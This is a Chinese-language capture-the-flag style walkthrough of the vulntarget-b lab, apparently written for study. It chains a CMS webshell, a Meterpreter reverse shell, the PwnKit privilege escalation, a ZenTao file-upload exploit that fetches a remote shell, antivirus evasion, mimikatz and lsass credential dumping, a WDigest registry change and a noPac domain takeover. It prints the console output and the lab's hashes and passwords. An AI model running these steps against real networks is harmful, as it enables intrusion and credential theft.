【vulntarget】系列：vulntarget-b 练习WP

关注WX：【小白SEC】查看更多内容……

---

本文仅为学习【vulntarget】，在本地环境测试验证，无其它目的，请勿进行未经授权的测试

一、靶场信息：

下载地址：

百度云:
链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA
提取码:s4ka

**拓扑图：**IP信息根据本地搭建环境自行配置改变

官方WP：vulntarget漏洞靶场系列（二）— vulntarget-b

二、使用到的工具、漏洞或技术：

工具：
Viper、nmap、蚁剑
漏洞或技术：
极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278

三、步骤：

1. 通过端口扫描工具，查找靶机IP及端口信息，此处靶机的IP为192.168.100.19，直接扫描靶机IP信息
   

2. 依次访问靶机的端口，发现81端口打开为极致CMS:

3. 此处利用极致CMS后台getshell，访问admin.php，抓包进行密码爆破，得到密码 admin23：

4. 获取密码后，登陆后台后依次点击：插件管理 - 插件列表 - 搜索【在线编辑】

5. 点击右侧【下载】按钮进行下载，下载成功后点击【安装】，安装完成后再点击【配置】，在弹出的页面随意输入用户名和密码点击2次【立即提交】即可：

6. 在新打开的页面点击【登录】：

7. 进入文件管理器后，可以任意新建、上传或修改文件进行传入webshell，此处选择将index.php修改为webshell，双击index.php文件，再点击【编辑】：

8. 写入一句话后点击右上角【save】：

9. 再次访问首页，出现phpinfo，即webshell写入成功，使用蚁剑连接：

10. viper开启监听，此处要选择linux的payload：

11. 生成elf格式后门：

12. 将elf文件上传至靶机，再执行的时候发现宝塔禁用函数，此处使用蚁剑插件进行绕过：

13. 使用插件绕过后，添加执行权限，并执行centos.elf文件：

14. 返回viper查看，centos已上线，但是权限较低，需要进行提权：

15. 打开MSFCONSOLE，进入centos的session，查找可提权模块：

msf6 > msf6 > msf6 > sessions 1
[*] Starting interaction with 1...

meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.100.19 - Collecting local exploits for x64/linux...
[*] 192.168.100.19 - 187 exploit checks are being tried...
[+] 192.168.100.19 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.100.19 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.100.19 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.100.19 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 192.168.100.19 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[+] 192.168.100.19 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.23 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 63 / 63
[*] 192.168.100.19 - Valid modules for session 1:
============================

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 4   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 5   exploit/linux/local/sudo_baron_samedit                              Yes                      The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.

meterpreter >

16. 此处使用 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 进行提权，进行如下设置后，输入 run 运行，稍后可看见root权限session上线：

meterpreter > bg[*] Backgrounding session 1...

msf6 > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files



Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.64.178   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 1112
LPORT => 1112
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.64.178:1112 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.csgzrd
[+] The target is vulnerable.
[*] Writing '/tmp/.vgugzbmkrnb/ngaufeqwitog/ngaufeqwitog.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.vgugzbmkrnb
[*] Sending stage (3016644 bytes) to 192.168.64.42
[+] Deleted /tmp/.vgugzbmkrnb/ngaufeqwitog/ngaufeqwitog.so
[+] Deleted /tmp/.vgugzbmkrnb/.jexrlg
[*] Meterpreter session 2 opened (192.168.64.178:1112 -> 192.168.64.42:1103) at 2023-06-27 08:09:30 +0000

meterpreter >

17. 添加路由，并扫描内网资产：

18. 扫描发现内网10.0.20.66存在3306、3389、8080端口，配置代理，进行访问：

19. 没法爆破，使用提示的账号密码登录：admin/Admin123
20. 查看版本信息，为禅道12.4.2版本：

也可以通过调用接口查看版本信息：http://10.0.20.66:8080/index.php?mode=getconfig

21. 利用禅道 12.4.2 后台任意文件上传漏洞进行getshell：

在centos的tmp目录下创建test.php的shell文件，使用python开启http服务:

构建URL为极致CMS中的index.php：HTTP://10.0.20.30:8081/test.php
再进行base64加密：SFRUUDovLzEwLjAuMjAuMzA6ODA4MS90ZXN0LnBocA==
通过URL请求：http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODA4MS90ZXN0LnBocA==

22. webshell上传成功后，访问URL无法访问，但是使用蚁剑可以连接成功：

23. 准备上线MSF，通过centos的session转发上线win10，建立监听，生成后门程序：

24. 生成的后门程序无法直接使用，因为win10存在杀软：

25. 制作免杀后门程序，此次直接使用工具生成免杀，上传到win10中并执行，这一步我的蚁剑没法上传，使用冰蝎进行上传，并执行：

26. Viper成功上线win10，低权限用户，需要进行提权：

27. 此处可直接使用 getsystem 提权：

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

28. 使用kiwi，获取明文密码信息：

meterpreter > load kiwiLoading extension kiwi...

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds all
[-] Unknown command: creds
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain      NTLM                              SHA1                                      DPAPI
--------       ------      ----                              ----                                      -----
Administrator  VULNTARGET  570a9a65db8fba761c1008a51d4c95ab  759e689a07a84246d0b202a80f5fd9e335ca5392  498266e09dee384e15ad686ed4de3822
Administrator  WIN10       579da618cfbfa85247acf1f800a280a4  39f572eceeaa2174e87750b52071582fc7f13118
WIN10$         VULNTARGET  dfda64c13ffda08549508af5e10824d0  67e0f7c22096658e1b897623c7ad877d4e1e1499
win101         VULNTARGET  282d975e35846022476068ab5a3d72df  bc9ecca8d006d8152bd51db558221a0540c9d604  8d6103509e746ac0ed9641f7c21d7cf7

wdigest credentials
===================

Username       Domain      Password
--------       ------      --------
(null)         (null)      (null)
Administrator  VULNTARGET  (null)
Administrator  WIN10       (null)
WIN10$         VULNTARGET  (null)
win101         VULNTARGET  (null)

kerberos credentials
====================

Username       Domain          Password
--------       ------          --------
(null)         (null)          (null)
Administrator  VULNTARGET.COM  Admin@123
Administrator  WIN10           (null)
Administrator  VULNTARGET.COM  admin@123
WIN10$         vulntarget.com  OE/MDy7v#-BBGb8qj/#kAkqw(aHS$r>@p/>%8`OK^tjpcJ?r&Fjgn!WN(/ta?X_E :/nF:A!v!qK5M.WzK:?`Wn!huUI0,kJQYMI'4tqypP<*GO_[R,=+z'!
win10$         VULNTARGET.COM  (null)
win101         VULNTARGET.COM  (null)


meterpreter >

29. win10已成功拿下，现在使用noPac拿下域控，需要获取当前域账号win101的密码信息，此处使用对NTLM直接进行解密，获得明文密码：admin#123：

30. 或者利用注册表和procdump+mimikatz获取密码：

修改注册表：reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改玩注册表后需要用户重新登录才能记录到密码信息，此处模拟用户使用win101账户登录

meterpreter > shell
Process 10356 created.
Channel 1 created.
Microsoft Windows [版本 10.0.18363.418]
(c) 2019 Microsoft Corporation。保留所有权利。

C:\inetpub\zentao\zentaopms\www\data\client\1>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
操作成功完成。

C:\inetpub\zentao\zentaopms\www\data\client\1>

31. 上传procdump到win10机器中，获取lsass文件：

C:\inetpub\zentao\zentaopms\www\data\client\1\lsass>procdump64.exe -accepteula -ma lsass.exe  lsass.dmp
procdump64.exe -accepteula -ma lsass.exe  lsass.dmp

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[12:13:26] Dump 1 initiated: C:\inetpub\zentao\zentaopms\www\data\client\1\lsass\lsass.dmp
[12:13:27] Dump 1 writing: Estimated dump file size is 46 MB.
[12:13:28] Dump 1 complete: 47 MB written in 1.5 seconds
[12:13:28] Dump count reached.


C:\inetpub\zentao\zentaopms\www\data\client\1\lsass>

32. 本地使用mimikatz.exe进行读取：

mimikatz.exe "sekurlsa::minidump lsass.dmp""sekurlsa::logonPasswords full" exit

33. 收集域信息：

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions 10
[*] Starting interaction with 10...

meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: WIN-UH20PRD3EAO.vulntarget.com (IP: 10.0.10.100)
meterpreter >

34. 添加路由后，开启代理，使用kali配置代理，使用noPac攻击，拿下域控：

35. 完整链路图：

靶场WP持续更新……